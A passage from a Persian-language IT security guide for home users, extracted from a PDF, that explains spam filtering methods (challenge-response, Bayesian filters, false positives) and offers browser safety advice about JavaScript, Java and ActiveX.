‫ﻫﺮﺯﻧﺎﻣﻪ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺑـﺎﺭ‬
‫ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺩﺭ ﺍﺛـﺮ ﺍﻳـﻦ ﺗـﺸﺨﻴﺺ‪ ،‬ﻧﺎﻣـﺔ‬
‫ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﺑﺠﺎﻱ ﺗﺤﻮﻳﻞ ﺷﺪﻥ‪ ،‬ﺣﺬﻑ ﮔـﺮﺩﺩ‪ .‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﺎ ‪ False Positive‬ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺎﺩﻱ‬
‫ﻭ ﺑﻲﺿﺮﺭ ﺍﺯ ﺩﺳﺖ ﺑﺮﻭﻧﺪ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ‪.‬‬
‫‪Mail Client‬‬
‫‪Scanning Program‬‬
‫‪74‬‬
‫‪75‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺍﮔﺮ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻣﻄﻠﺒﻲ ﺑﺎﺷﺪ ﻛﻪ‬
‫ﺑﺎ ﺗﻤﺎﻡ ﺗﻌﺎﺭﻳﻒ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﺷﻮﺩ‪ ،‬ﺁﻳﺎ ﺣﺘﻤـﹰﺎ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؟ ﭘﺎﺳﺦ‪ :‬ﺑﻠﻪ؛ ﺍﻣﺎ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ‬
‫ﻼ ﺍﮔـﺮ ﺍﻳـﻦ‬
‫ﺍﺻﻞ ﺁﻥ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻣﺎ ﻣـﺜ ﹰ‬
‫ﻧﺎﻣـــﻪ ﺍﺯ ﺳـــﻮﻱ ﻳﻜـــﻲ ﺍﺯ ﺧﻮﺍﻧﻨـــﺪﮔﺎﻥ ﺑـــﺮﺍﻱ‬
‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻭ ﺩﺭ ﺁﻥ ﻣﺜﺎﻟﻬـﺎﻱ‬
‫ﺟﺎﻟﺒﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺫﻛـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ‬
‫ﻣﻄﻤﺌﻨﹰﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ ﻭ ﻧﺒﺎﻳﺪ ﻏﺮﺑﺎﻝ ﺷﻮﺩ‪.‬‬
‫ﻣـﺸﻜﻞ ﻭ ﭘﺮﻫﺰﻳﻨـﻪ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﻫـﻴﭻ ﺭﺍﻫﻜـﺎﺭ‬
‫ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺁﻥ ﺍﻧﺪﻳﺸﻴﺪﻩ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪٨٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻫﺪﻑ ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﺟـﺴﺘﺠﻮﻱ ﻫﺮﺯﻧﺎﻣـﻪ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻥ‬
‫‪ False Negative‬ﻭ ﺍﺯ ﺑــﻴﻦ ﺑــﺮﺩﻥ ‪False Positive‬‬
‫ﻻ‬
‫ﻣــﻲﺑﺎﺷــﺪ‪ .‬ﻣﺘﺄﺳــﻔﺎﻧﻪ ﻛــﺎﻫﺶ ‪ False Negative‬ﻣﻌﻤــﻮ ﹰ‬
‫‪ False Positive‬ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺑـﻪ ﻫـﺮ‬
‫ﺩﻟﻴﻠﻲ ﻧﻴﺎﺯ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﺒﻴﻪ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺁﺳـﻴﺐ ﺑﻴﻨﻨـﺪ‪ .‬ﺁﺧـﺮﻳﻦ ﻧﻤﻮﻧـﺔ‬
‫ﮔﺰﺍﺭﺵﺷﺪﺓ ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺧﺒﺮﻧﺎﻣـﺔ ﺩﺍﻧـﺸﮕﺎﻫﻲ ﺑـﻮﺩ‬
‫ﻛﻪ ﺩﺭ ﺁﻥ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﻣﻄﺎﻟﺒﻲ ﻣﻄﺮﺡ ﺷـﺪﻩ ﺑـﻮﺩ‪ .‬ﺍﺯ‬
‫ﺁﻧﺠﺎ ﻛﻪ ﺧﺒﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﻮﺩ‪،‬‬
‫ﺗﻮﺳﻂ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻫﺮﺯﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺷـﺪ ﻭ‬
‫‪ISP‬ﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺁﻧﺮﺍ ﻏﺮﺑﺎﻝ ﻭ ﺣﺬﻑ ﻧﻤﻮﺩﻧﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻫﺮﺯﻧﺎﻣـﻪ‪ ،‬ﺭﻭﺷـﻬﺎﻱ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﻓﻨﻮﻥ ﭘﺮﺳﺶ ‪ -‬ﭘﺎﺳﺦ‪ ٧٦‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻧﺎﻣـﻪﺍﻱ ﺍﺯ ﻳـﻚ ﻓﺮﺳـﺘﻨﺪﺓ‬
‫ﻧﺎﺷﻨﺎﺱ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ )ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﺑﺎﺯ‬
‫ﻛﻨﺪ( ﻣﺘﻮﻗﻒ ﻣﻲ ﮔﺮﺩﺩ‪ .‬ﺳﭙﺲ ﭘﺮﺳﺸﻲ ﺑـﺮﺍﻱ ﻓﺮﺳـﺘﻨﺪﻩ ﺍﺭﺳـﺎﻝ‬
‫ﻣــﻲﺷــﻮﺩ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﻭﻱ ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﮔــﺮﺩﺩ ﻧﺎﻣــﻪﺍﻱ ﻛــﻪ‬
‫ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﺗـﺎ ﺛﺎﺑـﺖ ﺷـﻮﺩ ﺁﻥ ﻧﺎﻣـﻪ ﺍﺯ ﺳـﻮﻱ‬
‫ﻫﻤﺎﻥ ﻓﺮﺩ ﺍﺳﺖ ﻭ ﻧﻪ ﺍﺯ ﺟﺎﻧﺐ ﺷﺨﺺ ﺩﻳﮕﺮ ﻳﺎ ﻳﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‪.‬‬
‫ﻓﺮﻡ ﺗﺄﻳﻴﺪﻳﻪ ﭼﻨﺎﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﻧﻤـﻲﺗﻮﺍﻧـﺪ‬
‫ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ ﻭ ﻧﻴﺰ ﺑﺮﺍﻱ ﻫﺮﺯﻧﺎﻣﻪﻫﺎﻱ ﺑﻌﺪﻱ ﻣﺆﺛﺮ ﻧﻴﺴﺖ‪ .‬ﺍﮔـﺮ‬
‫ﺗﺎ ﭼﻨﺪ ﺭﻭﺯ ﻫﻴﭻ ﺗﺄﻳﻴﺪﻳﻪﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻧﺸﻮﺩ‪ ،‬ﻧﺎﻣﻪ ﺑﺠـﺎﻱ ﺗﺤﻮﻳـﻞ‬
‫ﺷﺪﻥ‪ ،‬ﺣﺬﻑ ﻣﻲﮔﺮﺩﺩ‪ .‬ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻣﻨـﺪ‬
‫ﻣﺪﺍﺧﻠﺔ ﺩﺳﺘﻲ ﻓﺮﺳﺘﻨﺪﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻧﺎﻣـﻪﺍﻱ ﺭﺍ ﺑﻔﺮﺳـﺘﻴﺪ ﻭ ﻗـﺎﺩﺭ‬
‫ﻧﺒﺎﺷﻴﺪ ﻛﻪ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺗﺄﻳﻴﺪﻳﻪ ﺳﺮﻳﻌﹰﺎ ﭘﺎﺳﺦ ﺩﻫﻴﺪ ﻧﺎﻣـﺔ ﺷـﻤﺎ‬
‫ﺗﺤﻮﻳﻞ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺩﻭ ‪ ISP‬ﺑﺼﻮﺭﺕ ﻣﺘﻘﺎﺑـﻞ ﺍﺯ‬
‫ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻫﺮﮔـﺰ ﺍﺯ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻧﺎﻣـﻪﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﻧﻜﻨﻨـﺪ؛ ﺯﻳـﺮﺍ ﺍﻭﻟـﻴﻦ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ ﻧﺎﻣــﻪ ﺭﺍ‬
‫ﻧﻤﻲﺑﻴﻨﺪ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺗﺄﻳﻴـﺪ ﺷـﺪﻩ ﺑﺎﺷـﺪ‪ ،‬ﻭ ﺗﻘﺎﺿـﺎﻱ ﺗﺄﻳﻴـﺪ ﻧﻴـﺰ‬
‫ﺍﺭﺳﺎﻝ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﭼﻮﻥ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﺻﺎﻓﻴﻬﺎﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻧﺎﻣﻪﻫـﺎﻱ ﻣـﺸﻜﻮﻙ ﺭﺍ ﺣـﺬﻑ‬
‫ﻛﻨﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﭘﻮﺷﺔ ﻣﺨﺼﻮﺹ ﻗﺮﺍﺭ ﻣﻲ ﺩﻫﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ‬
‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﭘﻮﺷﺔ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﺗـﺎ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﻗﺮﺑﺎﻧﻴﻬﺎﻱ ‪False Positive‬‬
‫ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫‪Challenge-Response‬‬
‫‪76‬‬
‫ﺭﻭﺵ ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨــﺪﺓ ﺟﺪﻳــﺪ ﺿــﺪ ﻫﺮﺯﻧﺎﻣــﻪ ﺭﻭﺷــﻲ ﺑــﻪ ﻧــﺎﻡ‬
‫‪ Bayesian Filtering‬ﺍﺳـــﺖ‪ .‬ﺩﺭ ﺍﻳـــﻦ ﺭﻭﺵ ﻗـــﻮﺍﻧﻴﻦ‬
‫ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﺑﺎ ﺷﻨﺎﺧﺖ ﺷﻤﺎ ﺍﺯ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺻﻼﺡ ﻣﻲ ﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﻗﻮﺍﻧﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩﺍﻱ ﻣﺘﻐﻴـﺮ ﺑﺎﺷـﻨﺪ‪.‬‬
‫ﻫﺪﻑ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﺁﻣﻮﺯﺵ ﺩﻳﺪﻥ ﺑﺮﻧﺎﻣﻪ ﻏﺮﺑـﺎﻝﺳـﺎﺯ ﺍﺯ ﺭﻓﺘـﺎﺭ‬
‫ﺷﻤﺎ ﺍﺳﺖ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﻓﺮﺩ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫـﺪ ﻭ‬
‫ﻻ ﺑﻌﻨﻮﺍﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﻲﺷـﻮﻧﺪ ﺍﻣـﺎ‬
‫ﻣﺤﺘﻮﻳﺎﺗﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺷـﻤﺎ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﺭﺩ ﻛﻨـﺪ‪ .‬ﺻـﺎﻓﻴﻬﺎﻱ‬
‫‪ bayesian‬ﺍﺯ ﻓﻨﻮﻥ ﺯﺑﺎﻥﺷﻨﺎﺳـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺑـﻪ‬
‫ﻧﺎﻣﻪ ﻫﺎﻳﻲ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﺩﻫﻨﺪ ﻛﻪ ﺣﺎﻭﻱ ﻟﻐﺎﺕ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‬
‫ﻭ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﺔ ﺭﻓﺘﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﻤﺎ ﺩﺭ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻗﻌﻴﺘﺎﻥ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﺍﻣﺎ ﺑﻨﺪﺭﺕ ﺩﺭ ﻫﺮﺯﻧﺎﻣـﻪ ﻇـﺎﻫﺮ‬
‫ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺻﺎﻓﻴﻬﺎﻱ ‪ bayesian‬ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺷﺪﻩ ﺍﺳـﺖ ﺑﺎﻳـﺪ ﺑﺮﺭﺳـﻲ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ‪ ISP‬ﺷـﻤﺎ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳـﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﻌﻠـﻮﻡ ﺷـﻮﺩ ﺁﻳـﺎ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺭﺍ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﻨﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﻧﻮﺷﺘﻪ ﺷﺪ‪ ،‬ﻭﺏ ﺣﺪﻭﺩ ‪۱۰‬‬
‫ﺳﺎﻝ ﺑﺎ ﺳﻄﻮﺡ ﺩﺳﺘﺮﺳﻲ ﻣﺨﺘﻠﻒ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻭﺟﻮﺩ ﻭﺏ ﺑـﺮﺍﻱ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ‬
‫ﻣﺮﺗﺒﹰﺎ ﺩﺭ ﻛـﺎﺭ‪ ،‬ﻣﺪﺭﺳـﻪ ﻭ ﺗﻔـﺮﻳﺢ ﺍﺯ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‬
‫ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻭﺏ ﺑﺼﻮﺭﺕ ﺍﺑﺰﺍﺭﻱ ﻣﻔﻴﺪ ﻭ ﺭﺍﻳـﺞ ﺩﺭ‬
‫ﺁﻣﺪﻩ‪ ،‬ﻓﺮﺍﻣﻮﺵ ﺷﺪﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺤﻴﻄﻲ ﺧﺼﻮﻣﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺮﻭﺭﮔﺮﻫﺎ‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﻭﺏ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤﻦ ﺍﺳـﺖ ﺍﻣـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺧﻄـﺮﺍﺕ‬
‫ﻻ ﺩﺍﺭﺍﻱ ﻣﺘﻨﻬـﺎ‬
‫ﺑﺎﻟﻘﻮﻩﺍﻱ ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ‪ .‬ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻌﻤﻮ ﹰ‬
‫‪٧٨‬‬
‫ﻭ ﺗﺼﺎﻭﻳﺮ ﺍﻳﺴﺘﺎ‪ ٧٧‬ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﻳﺎﻳﻲ ﻧﻴﺰ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﺪﻩ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫‪Static‬‬
‫‪Dynamic‬‬
‫‪77‬‬
‫‪78‬‬
‫‪٨٥‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻗﺎﻧﻮﻥ ﻳﺎﺯﺩﻫﻢ‬
‫ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ‬
‫ﻣﺨﺮﺏ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ‪ download‬ﻭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪،‬‬
‫ﻼ ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺍﺷـﺘﻪ‬
‫ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺑﻪ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﺎﻣ ﹰ‬
‫ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ‪ download‬ﭘﻮﻳـﺎ ﻭ ﺧﻮﺩﻛـﺎﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺧﻄﺮﻧﺎﻙ ﻭ ﻣﺨﺮﺏ ﻧﻴﺰ ﺑﺎﺷﺪ‪ .‬ﻛﻠﻴﺔ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ‬
‫ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ‪ ActiveX ،Java ،JavaScript‬ﻭ‬
‫ﺩﻳﮕﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧـﻮﺩ ‪download‬‬
‫ﻼ ﺍﻳﻤﻦ ﺑﺎﺷﻴﺪ ﻧﺒﺎﻳـﺪ ﺍﺟـﺎﺯﺓ‬
‫ﻭ ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻛﺎﻣ ﹰ‬
‫ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺻﺎﺩﺭ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺑﺎ ﻏﻴﺮﻓﻌـﺎﻝ ﻧﻤـﻮﺩﻥ‬
‫ﺍﻳﻦ ﻭﻳﮋﮔﻴﻬﺎ ﻣﺘﻮﺟﻪ ﺧﻮﺍﻫﻴﺪ ﺷﺪ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ‬
‫ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻣﺜﻞ ﮔﺬﺷﺘﻪ ﻛﺎﺭ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺠﺎﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳـﻦ ﻫﻤـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺑﺎﻳـﺪ‬
‫ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﺭﺍﻩ ﺣﻞ ﻣﻨﻄﻘﻲ ﺑﻮﺩ‪:‬‬
‫•‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤـﻦ ﻭ ﺭﺍﻳـﺞ ﻣﺎﻧﻨـﺪ ‪ Javascript‬ﺭﺍ‬
‫ﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳـﺎﺩﻱ ﺍﺟـﺎﺯﻩ‬
‫ﻣﻲﺩﻫﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻋﻤﻞ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ ‪ Java‬ﻭ ‪ ActiveX‬ﻛﻪ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ‬
‫ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴـﺪ ﻳـﺎ‬
‫ﻣﺮﻭﺭﮔــﺮ ﺧــﻮﺩ ﺭﺍ ﻃــﻮﺭﻱ ﺗﻨﻈــﻴﻢ ﻧﻤﺎﻳﻴــﺪ ﻛــﻪ ﻗﺒــﻞ ﺍﺯ‬
‫ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻧﻬﺎ ﺍﺯ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﺑﮕﻴـﺮﺩ‪ .‬ﻏﻴﺮﻓﻌـﺎﻝ ﻧﻤـﻮﺩﻥ‬
‫ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺪﻳﻦ ﻣﻌﻨﺎﺳـﺖ ﻛـﻪ ﺍﺯ ﺁﻥ ﭘـﺲ ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺗﻮﺍﺑﻊ ﻣﺮﻭﺭﮔﺮ ﻛﺎﺭ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ‪ .‬ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻌـﻀﻲ‬
